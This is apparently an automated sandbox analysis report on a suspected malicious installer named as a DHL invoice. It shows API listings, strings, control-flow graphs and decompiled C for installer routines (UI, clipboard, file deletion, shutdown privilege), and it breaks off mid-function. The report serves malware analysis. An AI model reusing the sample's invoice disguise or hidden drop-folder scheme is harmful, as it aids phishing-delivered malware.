                                        • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 00403554
                                        • ExitProcess.KERNEL32 ref: 00403575
                                        • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403692
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00403699
                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004036B1
                                        • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004036D0
                                        • ExitWindowsEx.USER32 ref: 004036F4
                                        • ExitProcess.KERNEL32 ref: 00403717
                                          • Part of subcall function 004056F6: MessageBoxIndirectA.USER32 ref: 00405751
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                        • String ID: "$"C:\Users\user\Desktop\DHLINV000156.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Styringsmidlernes\Pinkfishes109\Supersensitizations172\Smaskforvirrede$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DHLINV000156.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                        • API String ID: 3776617018-1047690848
                                        • Opcode ID: 47f0f4bfed41ce18027c3f7b4cd283128f530326f184dcc79bdceb26c856a261
                                        • Instruction ID: 70de6b230954929a2c0fab4aa6e61a8dc1a32ac2bd4530e0982157a086cffda4
                                        • Opcode Fuzzy Hash: 47f0f4bfed41ce18027c3f7b4cd283128f530326f184dcc79bdceb26c856a261
                                        • Instruction Fuzzy Hash: 62C1F6706086526AE7216F759D49B2F3EA8EB81706F04453FF541B61E2CB7C8E05CB2E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 134 40523f-40525b 135 405261-405328 GetDlgItem * 3 call 40409d call 40498e GetClientRect GetSystemMetrics SendMessageA * 2 134->135 136 4053ea-4053f0 134->136 154 405346-405349 135->154 155 40532a-405344 SendMessageA * 2 135->155 138 4053f2-405414 GetDlgItem CreateThread FindCloseChangeNotification 136->138 139 40541a-405426 136->139 138->139 140 405448-40544e 139->140 141 405428-40542e 139->141 145 405450-405456 140->145 146 4054a3-4054a6 140->146 143 405430-405443 ShowWindow * 2 call 40409d 141->143 144 405469-405470 call 4040cf 141->144 143->140 158 405475-405479 144->158 151 405458-405464 call 404041 145->151 152 40547c-40548c ShowWindow 145->152 146->144 149 4054a8-4054ae 146->149 149->144 156 4054b0-4054c3 SendMessageA 149->156 151->144 159 40549c-40549e call 404041 152->159 160 40548e-405497 call 405101 152->160 161 405359-405370 call 404068 154->161 162 40534b-405357 SendMessageA 154->162 155->154 163 4055c0-4055c2 156->163 164 4054c9-4054f5 CreatePopupMenu call 405ffc AppendMenuA 156->164 159->146 160->159 173 405372-405386 ShowWindow 161->173 174 4053a6-4053c7 GetDlgItem SendMessageA 161->174 162->161 163->158 171 4054f7-405507 GetWindowRect 164->171 172 40550a-405520 TrackPopupMenu 164->172 171->172 172->163 175 405526-405540 172->175 176 405395 173->176 177 405388-405393 ShowWindow 173->177 174->163 178 4053cd-4053e5 SendMessageA * 2 174->178 179 405545-405560 SendMessageA 175->179 180 40539b-4053a1 call 40409d 176->180 177->180 178->163 179->179 181 405562-405582 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 179->181 180->174 183 405584-4055a4 SendMessageA 181->183 183->183 184 4055a6-4055ba GlobalUnlock SetClipboardData CloseClipboard 183->184 184->163
                                        C-Code - Quality: 96%
                                        			E0040523F(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                        				struct HWND__* _v8;
                                        				struct tagRECT _v24;
                                        				void* _v32;
                                        				signed int _v36;
                                        				int _v40;
                                        				int _v44;
                                        				signed int _v48;
                                        				int _v52;
                                        				void* _v56;
                                        				void* _v64;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				struct HWND__* _t87;
                                        				struct HWND__* _t89;
                                        				long _t90;
                                        				int _t95;
                                        				int _t96;
                                        				long _t99;
                                        				void* _t102;
                                        				intOrPtr _t113;
                                        				void* _t121;
                                        				intOrPtr _t124;
                                        				struct HWND__* _t128;
                                        				int _t150;
                                        				int _t153;
                                        				long _t157;
                                        				struct HWND__* _t161;
                                        				struct HMENU__* _t163;
                                        				long _t165;
                                        				void* _t166;
                                        				char* _t167;
                                        				char* _t168;
                                        				int _t169;
                                        
                                        				_t87 =  *0x422ee4; // 0x103f8
                                        				_t157 = _a8;
                                        				_t150 = 0;
                                        				_v8 = _t87;
                                        				if(_t157 != 0x110) {
                                        					__eflags = _t157 - 0x405;
                                        					if(_t157 == 0x405) {
                                        						_t121 = CreateThread(0, 0, E004051D3, GetDlgItem(_a4, 0x3ec), 0,  &_a8); // executed
                                        						FindCloseChangeNotification(_t121);
                                        					}
                                        					__eflags = _t157 - 0x111;
                                        					if(_t157 != 0x111) {
                                        						L17:
                                        						__eflags = _t157 - 0x404;
                                        						if(_t157 != 0x404) {
                                        							L25:
                                        							__eflags = _t157 - 0x7b;
                                        							if(_t157 != 0x7b) {
                                        								goto L20;
                                        							}
                                        							_t89 = _v8;
                                        							__eflags = _a12 - _t89;
                                        							if(_a12 != _t89) {
                                        								goto L20;
                                        							}
                                        							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
                                        							__eflags = _t90 - _t150;
                                        							_a12 = _t90;
                                        							if(_t90 <= _t150) {
                                        								L36:
                                        								return 0;
                                        							}
                                        							_t163 = CreatePopupMenu();
                                        							AppendMenuA(_t163, _t150, 1, E00405FFC(_t150, _t157, _t163, _t150, 0xffffffe1));
                                        							_t95 = _a16;
                                        							__eflags = _a16 - 0xffffffff;
                                        							_t153 = _a16 >> 0x10;
                                        							if(_a16 == 0xffffffff) {
                                        								GetWindowRect(_v8,  &_v24);
                                        								_t95 = _v24.left;
                                        								_t153 = _v24.top;
                                        							}
                                        							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
                                        							__eflags = _t96 - 1;
                                        							if(_t96 == 1) {
                                        								_t165 = 1;
                                        								__eflags = 1;
                                        								_v56 = _t150;
                                        								_v44 = 0x41fd08;
                                        								_v40 = 0x1000;
                                        								_a4 = _a12;
                                        								do {
                                        									_a4 = _a4 - 1;
                                        									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
                                        									__eflags = _a4 - _t150;
                                        									_t165 = _t165 + _t99 + 2;
                                        								} while (_a4 != _t150);
                                        								OpenClipboard(_t150);
                                        								EmptyClipboard();
                                        								_t102 = GlobalAlloc(0x42, _t165);
                                        								_a4 = _t102;
                                        								_t166 = GlobalLock(_t102);
                                        								do {
                                        									_v44 = _t166;
                                        									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
                                        									 *_t167 = 0xd;
                                        									_t168 = _t167 + 1;
                                        									 *_t168 = 0xa;
                                        									_t166 = _t168 + 1;
                                        									_t150 = _t150 + 1;
                                        									__eflags = _t150 - _a12;
                                        								} while (_t150 < _a12);
                                        								GlobalUnlock(_a4);
                                        								SetClipboardData(1, _a4);
                                        								CloseClipboard();
                                        							}
                                        							goto L36;
                                        						}
                                        						__eflags =  *0x422ecc - _t150; // 0x0
                                        						if(__eflags == 0) {
                                        							ShowWindow( *0x423708, 8);
                                        							__eflags =  *0x4237ac - _t150;
                                        							if( *0x4237ac == _t150) {
                                        								_t113 =  *0x41f4e0; // 0x4ea08c
                                        								E00405101( *((intOrPtr*)(_t113 + 0x34)), _t150);
                                        							}
                                        							E00404041(1);
                                        							goto L25;
                                        						}
                                        						 *0x41f0d8 = 2;
                                        						E00404041(0x78);
                                        						goto L20;
                                        					} else {
                                        						__eflags = _a12 - 0x403;
                                        						if(_a12 != 0x403) {
                                        							L20:
                                        							return E004040CF(_t157, _a12, _a16);
                                        						}
                                        						ShowWindow( *0x422ed0, _t150);
                                        						ShowWindow(_v8, 8);
                                        						E0040409D(_v8);
                                        						goto L17;
                                        					}
                                        				}
                                        				_v48 = _v48 | 0xffffffff;
                                        				_v36 = _v36 | 0xffffffff;
                                        				_t169 = 2;
                                        				_v56 = _t169;
                                        				_v52 = 0;
                                        				_v44 = 0;
                                        				_v40 = 0;
                                        				asm("stosd");
                                        				asm("stosd");
                                        				_t124 =  *0x423714;
                                        				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
                                        				_a8 =  *((intOrPtr*)(_t124 + 0x60));
                                        				 *0x422ed0 = GetDlgItem(_a4, 0x403);
                                        				 *0x422ec8 = GetDlgItem(_a4, 0x3ee);
                                        				_t128 = GetDlgItem(_a4, 0x3f8);
                                        				 *0x422ee4 = _t128;
                                        				_v8 = _t128;
                                        				E0040409D( *0x422ed0);
                                        				 *0x422ed4 = E0040498E(4);
                                        				 *0x422eec = 0;
                                        				GetClientRect(_v8,  &_v24);
                                        				_v48 = _v24.right - GetSystemMetrics(_t169);
                                        				SendMessageA(_v8, 0x101b, 0,  &_v56); // executed
                                        				SendMessageA(_v8, 0x1036, 0x4000, 0x4000); // executed
                                        				if(_a12 >= 0) {
                                        					SendMessageA(_v8, 0x1001, 0, _a12);
                                        					SendMessageA(_v8, 0x1026, 0, _a12);
                                        				}
                                        				if(_a8 >= _t150) {
                                        					SendMessageA(_v8, 0x1024, _t150, _a8);
                                        				}
                                        				_push( *((intOrPtr*)(_a16 + 0x30)));
                                        				_push(0x1b);
                                        				E00404068(_a4);
                                        				if(( *0x42371c & 0x00000003) != 0) {
                                        					ShowWindow( *0x422ed0, _t150);
                                        					if(( *0x42371c & 0x00000002) != 0) {
                                        						 *0x422ed0 = _t150;
                                        					} else {
                                        						ShowWindow(_v8, 8);
                                        					}
                                        					E0040409D( *0x422ec8);
                                        				}
                                        				_t161 = GetDlgItem(_a4, 0x3ec);
                                        				SendMessageA(_t161, 0x401, _t150, 0x75300000);
                                        				if(( *0x42371c & 0x00000004) != 0) {
                                        					SendMessageA(_t161, 0x409, _t150, _a8);
                                        					SendMessageA(_t161, 0x2001, _t150, _a12);
                                        				}
                                        				goto L36;
                                        			}





































                                        0x00405245
                                        0x0040524d
                                        0x00405250
                                        0x00405258
                                        0x0040525b
                                        0x004053ea
                                        0x004053f0
                                        0x0040540d
                                        0x00405414
                                        0x00405414
                                        0x00405420
                                        0x00405426
                                        0x00405448
                                        0x00405448
                                        0x0040544e
                                        0x004054a3
                                        0x004054a3
                                        0x004054a6
                                        0x00000000
                                        0x00000000
                                        0x004054a8
                                        0x004054ab
                                        0x004054ae
                                        0x00000000
                                        0x00000000
                                        0x004054b8
                                        0x004054be
                                        0x004054c0
                                        0x004054c3
                                        0x004055c0
                                        0x00000000
                                        0x004055c0
                                        0x004054d2
                                        0x004054de
                                        0x004054e7
                                        0x004054ee
                                        0x004054f2
                                        0x004054f5
                                        0x004054fe
                                        0x00405504
                                        0x00405507
                                        0x00405507
                                        0x00405517
                                        0x0040551d
                                        0x00405520
                                        0x0040552b
                                        0x0040552b
                                        0x0040552c
                                        0x0040552f
                                        0x00405536
                                        0x0040553d
                                        0x00405545
                                        0x00405545
                                        0x00405553
                                        0x00405559
                                        0x0040555c
                                        0x0040555c
                                        0x00405563
                                        0x00405569
                                        0x00405572
                                        0x00405579
                                        0x00405582
                                        0x00405584
                                        0x00405587
                                        0x00405596
                                        0x00405598
                                        0x0040559b
                                        0x0040559c
                                        0x0040559f
                                        0x004055a0
                                        0x004055a1
                                        0x004055a1
                                        0x004055a9
                                        0x004055b4
                                        0x004055ba
                                        0x004055ba
                                        0x00000000
                                        0x00405520
                                        0x00405450
                                        0x00405456
                                        0x00405484
                                        0x00405486
                                        0x0040548c
                                        0x0040548e
                                        0x00405497
                                        0x00405497
                                        0x0040549e
                                        0x00000000
                                        0x0040549e
                                        0x0040545a
                                        0x00405464
                                        0x00000000
                                        0x00405428
                                        0x00405428
                                        0x0040542e
                                        0x00405469
                                        0x00000000
                                        0x00405470
                                        0x00405437
                                        0x0040543e
                                        0x00405443
                                        0x00000000
                                        0x00405443
                                        0x00405426
                                        0x00405261
                                        0x00405265
                                        0x0040526d
                                        0x00405271
                                        0x00405274
                                        0x00405277
                                        0x0040527a
                                        0x0040527d
                                        0x0040527e
                                        0x0040527f
                                        0x00405298
                                        0x0040529b
                                        0x004052a5
                                        0x004052b4
                                        0x004052bc
                                        0x004052c4
                                        0x004052c9
                                        0x004052cc
                                        0x004052d8
                                        0x004052e1
                                        0x004052ea
                                        0x0040530c
                                        0x00405312
                                        0x00405323
                                        0x00405328
                                        0x00405336
                                        0x00405344
                                        0x00405344
                                        0x00405349
                                        0x00405357
                                        0x00405357
                                        0x0040535c
                                        0x0040535f
                                        0x00405364
                                        0x00405370
                                        0x00405379
                                        0x00405386
                                        0x00405395
                                        0x00405388
                                        0x0040538d
                                        0x0040538d
                                        0x004053a1
                                        0x004053a1
                                        0x004053b5
                                        0x004053be
                                        0x004053c7
                                        0x004053d7
                                        0x004053e3
                                        0x004053e3
                                        0x00000000

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                        • String ID: Sepad149: Installing
                                        • API String ID: 4154960007-2190826614
                                        • Opcode ID: 5e248db37e798cb99e868fa2efa30f8b142e25c36e83f8749ee739c671aa7136
                                        • Instruction ID: b9a96890980d2d8b9797d0de0d5ce2eab2fec2a682b8a0b11cb6d69254f0e8d6
                                        • Opcode Fuzzy Hash: 5e248db37e798cb99e868fa2efa30f8b142e25c36e83f8749ee739c671aa7136
                                        • Instruction Fuzzy Hash: C4A15CB1900208BFDB119FA0DD89AAE7FB9FB48355F00403AFA05B61A0C7B55E51DF69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 493 4057a2-4057c8 call 405a60 496 4057e1-4057e8 493->496 497 4057ca-4057dc DeleteFileA 493->497 499 4057ea-4057ec 496->499 500 4057fb-40580b call 405fda 496->500 498 40596b-40596f 497->498 501 4057f2-4057f5 499->501 502 405919-40591e 499->502 508 40581a-40581b call 4059b9 500->508 509 40580d-405818 lstrcatA 500->509 501->500 501->502 502->498 504 405920-405923 502->504 506 405925-40592b 504->506 507 40592d-405935 call 4062dd 504->507 506->498 507->498 516 405937-40594b call 405972 call 40575a 507->516 511 405820-405823 508->511 509->511 514 405825-40582c 511->514 515 40582e-405834 lstrcatA 511->515 514->515 517 405839-405857 lstrlenA FindFirstFileA 514->517 515->517 532 405963-405966 call 405101 516->532 533 40594d-405950 516->533 518 40585d-405874 call 40599d 517->518 519 40590f-405913 517->519 526 405876-40587a 518->526 527 40587f-405882 518->527 519->502 523 405915 519->523 523->502 526->527 529 40587c 526->529 530 405884-405889 527->530 531 405895-4058a3 call 405fda 527->531 529->527 535 40588b-40588d 530->535 536 4058ee-405900 FindNextFileA 530->536 543 4058a5-4058ad 531->543 544 4058ba-4058c5 call 40575a 531->544 532->498 533->506 538 405952-405961 call 405101 call 405db9 533->538 535->531 539 40588f-405893 535->539 536->518 541 405906-405909 FindClose 536->541 538->498 539->531 539->536 541->519 543->536 547 4058af-4058b8 call 4057a2 543->547 552 4058e6-4058e9 call 405101 544->552 553 4058c7-4058ca 544->553 547->536 552->536 555 4058cc-4058dc call 405101 call 405db9 553->555 556 4058de-4058e4 553->556 555->536 556->536
                                        C-Code - Quality: 98%
                                        			E004057A2(void* __eflags, signed int _a4, signed int _a8) {
                                        				signed int _v8;
                                        				void* _v12;
                                        				signed int _v16;
                                        				struct _WIN32_FIND_DATAA _v336;
                                        				signed int _t40;
                                        				char* _t53;
                                        				signed int _t55;
                                        				signed int _t58;
                                        				signed int _t64;
                                        				signed int _t66;
                                        				void* _t68;
                                        				signed char _t69;
                                        				CHAR* _t71;
                                        				void* _t72;
                                        				CHAR* _t73;
                                        				char* _t76;
                                        
                                        				_t69 = _a8;
                                        				_t73 = _a4;
                                        				_v8 = _t69 & 0x00000004;
                                        				_t40 = E00405A60(__eflags, _t73);
                                        				_v16 = _t40;
                                        				if((_t69 & 0x00000008) != 0) {
                                        					_t66 = DeleteFileA(_t73); // executed
                                        					asm("sbb eax, eax");
                                        					_t68 =  ~_t66 + 1;
                                        					 *0x4237a8 =  *0x4237a8 + _t68;
                                        					return _t68;
                                        				}
                                        				_a4 = _t69;
                                        				_t8 =  &_a4;
                                        				 *_t8 = _a4 & 0x00000001;
                                        				__eflags =  *_t8;
                                        				if( *_t8 == 0) {
                                        					L5:
                                        					E00405FDA(0x420d10, _t73);
                                        					__eflags = _a4;
                                        					if(_a4 == 0) {
                                        						E004059B9(_t73);
                                        					} else {
                                        						lstrcatA(0x420d10, "\*.*");
                                        					}
                                        					__eflags =  *_t73;
                                        					if( *_t73 != 0) {
                                        						L10:
                                        						lstrcatA(_t73, 0x409014);
                                        						L11:
                                        						_t71 =  &(_t73[lstrlenA(_t73)]);
                                        						_t40 = FindFirstFileA(0x420d10,  &_v336);
                                        						__eflags = _t40 - 0xffffffff;
                                        						_v12 = _t40;
                                        						if(_t40 == 0xffffffff) {
                                        							L29:
                                        							__eflags = _a4;
                                        							if(_a4 != 0) {
                                        								_t32 = _t71 - 1;
                                        								 *_t32 =  *(_t71 - 1) & 0x00000000;
                                        								__eflags =  *_t32;
                                        							}
                                        							goto L31;
                                        						} else {
                                        							goto L12;
                                        						}
                                        						do {
                                        							L12:
                                        							_t76 =  &(_v336.cFileName);
                                        							_t53 = E0040599D( &(_v336.cFileName), 0x3f);
                                        							__eflags =  *_t53;
                                        							if( *_t53 != 0) {
                                        								__eflags = _v336.cAlternateFileName;
                                        								if(_v336.cAlternateFileName != 0) {
                                        									_t76 =  &(_v336.cAlternateFileName);
                                        								}
                                        							}
                                        							__eflags =  *_t76 - 0x2e;
                                        							if( *_t76 != 0x2e) {
                                        								L19:
                                        								E00405FDA(_t71, _t76);
                                        								__eflags = _v336.dwFileAttributes & 0x00000010;
                                        								if(__eflags == 0) {
                                        									_t55 = E0040575A(__eflags, _t73, _v8);
                                        									__eflags = _t55;
                                        									if(_t55 != 0) {
                                        										E00405101(0xfffffff2, _t73);
                                        									} else {
                                        										__eflags = _v8 - _t55;
                                        										if(_v8 == _t55) {
                                        											 *0x4237a8 =  *0x4237a8 + 1;
                                        										} else {
                                        											E00405101(0xfffffff1, _t73);
                                        											E00405DB9(_t72, _t73, 0);
                                        										}
                                        									}
                                        								} else {
                                        									__eflags = (_a8 & 0x00000003) - 3;
                                        									if(__eflags == 0) {
                                        										E004057A2(__eflags, _t73, _a8);
                                        									}
                                        								}
                                        								goto L27;
                                        							}
                                        							_t64 =  *((intOrPtr*)(_t76 + 1));
                                        							__eflags = _t64;
                                        							if(_t64 == 0) {
                                        								goto L27;
                                        							}
                                        							__eflags = _t64 - 0x2e;
                                        							if(_t64 != 0x2e) {
                                        								goto L19;
                                        							}
                                        							__eflags =  *((char*)(_t76 + 2));
                                        							if( *((char*)(_t76 + 2)) == 0) {
                                        								goto L27;
                                        							}
                                        							goto L19;
                                        							L27:
                                        							_t58 = FindNextFileA(_v12,  &_v336);
                                        							__eflags = _t58;
                                        						} while (_t58 != 0);
                                        						_t40 = FindClose(_v12);
                                        						goto L29;
                                        					}
                                        					__eflags =  *0x420d10 - 0x5c;
                                        					if( *0x420d10 != 0x5c) {
                                        						goto L11;
                                        					}
                                        					goto L10;
                                        				} else {
                                        					__eflags = _t40;
                                        					if(_t40 == 0) {
                                        						L31:
                                        						__eflags = _a4;
                                        						if(_a4 == 0) {
                                        							L39:
                                        							return _t40;
                                        						}
                                        						__eflags = _v16;
                                        						if(_v16 != 0) {
                                        							_t40 = E004062DD(_t73);
                                        							__eflags = _t40;
                                        							if(_t40 == 0) {
                                        								goto L39;
                                        							}
                                        							E00405972(_t73);
                                        							_t40 = E0040575A(__eflags, _t73, _v8 | 0x00000001);
                                        							__eflags = _t40;
                                        							if(_t40 != 0) {
                                        								return E00405101(0xffffffe5, _t73);
                                        							}
                                        							__eflags = _v8;
                                        							if(_v8 == 0) {
                                        								goto L33;
                                        							}
                                        							E00405101(0xfffffff1, _t73);
                                        							return E00405DB9(_t72, _t73, 0);
                                        						}
                                        						L33:
                                        						 *0x4237a8 =  *0x4237a8 + 1;
                                        						return _t40;
                                        					}
                                        					__eflags = _t69 & 0x00000002;
                                        					if((_t69 & 0x00000002) == 0) {
                                        						goto L31;
                                        					}
                                        					goto L5;
                                        				}
                                        			}



















                                        0x004057ac
                                        0x004057b1
                                        0x004057ba
                                        0x004057bd
                                        0x004057c5
                                        0x004057c8
                                        0x004057cb
                                        0x004057d3
                                        0x004057d5
                                        0x004057d6
                                        0x00000000
                                        0x004057d6
                                        0x004057e1
                                        0x004057e4
                                        0x004057e4
                                        0x004057e4
                                        0x004057e8
                                        0x004057fb
                                        0x00405802
                                        0x00405807
                                        0x0040580b
                                        0x0040581b
                                        0x0040580d
                                        0x00405813
                                        0x00405813
                                        0x00405820
                                        0x00405823
                                        0x0040582e
                                        0x00405834
                                        0x00405839
                                        0x00405849
                                        0x0040584b
                                        0x00405851
                                        0x00405854
                                        0x00405857
                                        0x0040590f
                                        0x0040590f
                                        0x00405913
                                        0x00405915
                                        0x00405915
                                        0x00405915
                                        0x00405915
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040585d
                                        0x0040585d
                                        0x00405866
                                        0x0040586c
                                        0x00405871
                                        0x00405874
                                        0x00405876
                                        0x0040587a
                                        0x0040587c
                                        0x0040587c
                                        0x0040587a
                                        0x0040587f
                                        0x00405882
                                        0x00405895
                                        0x00405897
                                        0x0040589c
                                        0x004058a3
                                        0x004058be
                                        0x004058c3
                                        0x004058c5
                                        0x004058e9
                                        0x004058c7
                                        0x004058c7
                                        0x004058ca
                                        0x004058de
                                        0x004058cc
                                        0x004058cf
                                        0x004058d7
                                        0x004058d7
                                        0x004058ca
                                        0x004058a5
                                        0x004058ab
                                        0x004058ad
                                        0x004058b3
                                        0x004058b3
                                        0x004058ad
                                        0x00000000
                                        0x004058a3
                                        0x00405884
                                        0x00405887
                                        0x00405889
                                        0x00000000
                                        0x00000000
                                        0x0040588b
                                        0x0040588d
                                        0x00000000
                                        0x00000000
                                        0x0040588f
                                        0x00405893
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004058ee
                                        0x004058f8
                                        0x004058fe
                                        0x004058fe
                                        0x00405909
                                        0x00000000
                                        0x00405909
                                        0x00405825
                                        0x0040582c
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004057ea
                                        0x004057ea
                                        0x004057ec
                                        0x00405919
                                        0x0040591b
                                        0x0040591e
                                        0x0040596f
                                        0x0040596f
                                        0x0040596f
                                        0x00405920
                                        0x00405923
                                        0x0040592e
                                        0x00405933
                                        0x00405935
                                        0x00000000
                                        0x00000000
                                        0x00405938
                                        0x00405944
                                        0x00405949
                                        0x0040594b
                                        0x00000000
                                        0x00405966
                                        0x0040594d
                                        0x00405950
                                        0x00000000
                                        0x00000000
                                        0x00405955
                                        0x00000000
                                        0x0040595c
                                        0x00405925
                                        0x00405925
                                        0x00000000
                                        0x00405925
                                        0x004057f2
                                        0x004057f5
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004057f5

                                        APIs
                                        • DeleteFileA.KERNELBASE(?,?,74D0FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057CB
                                        • lstrcatA.KERNEL32(00420D10,\*.*,00420D10,?,?,74D0FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405813
                                        • lstrcatA.KERNEL32(?,00409014,?,00420D10,?,?,74D0FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405834
                                        • lstrlenA.KERNEL32(?,?,00409014,?,00420D10,?,?,74D0FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040583A
                                        • FindFirstFileA.KERNEL32(00420D10,?,?,?,00409014,?,00420D10,?,?,74D0FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040584B
                                        • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004058F8
                                        • FindClose.KERNEL32(00000000), ref: 00405909
                                        Strings
                                        • \*.*, xrefs: 0040580D
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004057AF
                                        • "C:\Users\user\Desktop\DHLINV000156.exe", xrefs: 004057A2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                        • String ID: "C:\Users\user\Desktop\DHLINV000156.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                        • API String ID: 2035342205-2748600485
                                        • Opcode ID: 9534ed492e479d78e2508825cc8aff22a23d0aad2da830bd7208bf437f0dd8c3
                                        • Instruction ID: d5f8e1a5a2f38c4268bcbec4acbb3c578bb2518a62eabdffbc14051f19ad4651
                                        • Opcode Fuzzy Hash: 9534ed492e479d78e2508825cc8aff22a23d0aad2da830bd7208bf437f0dd8c3
                                        • Instruction Fuzzy Hash: F251E171900A18BADB21BB228C45BAF7A79DF42724F14807BF841B51D2D77C8942DEAD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 74%
                                        			E00402138() {
                                        				signed int _t55;
                                        				void* _t59;
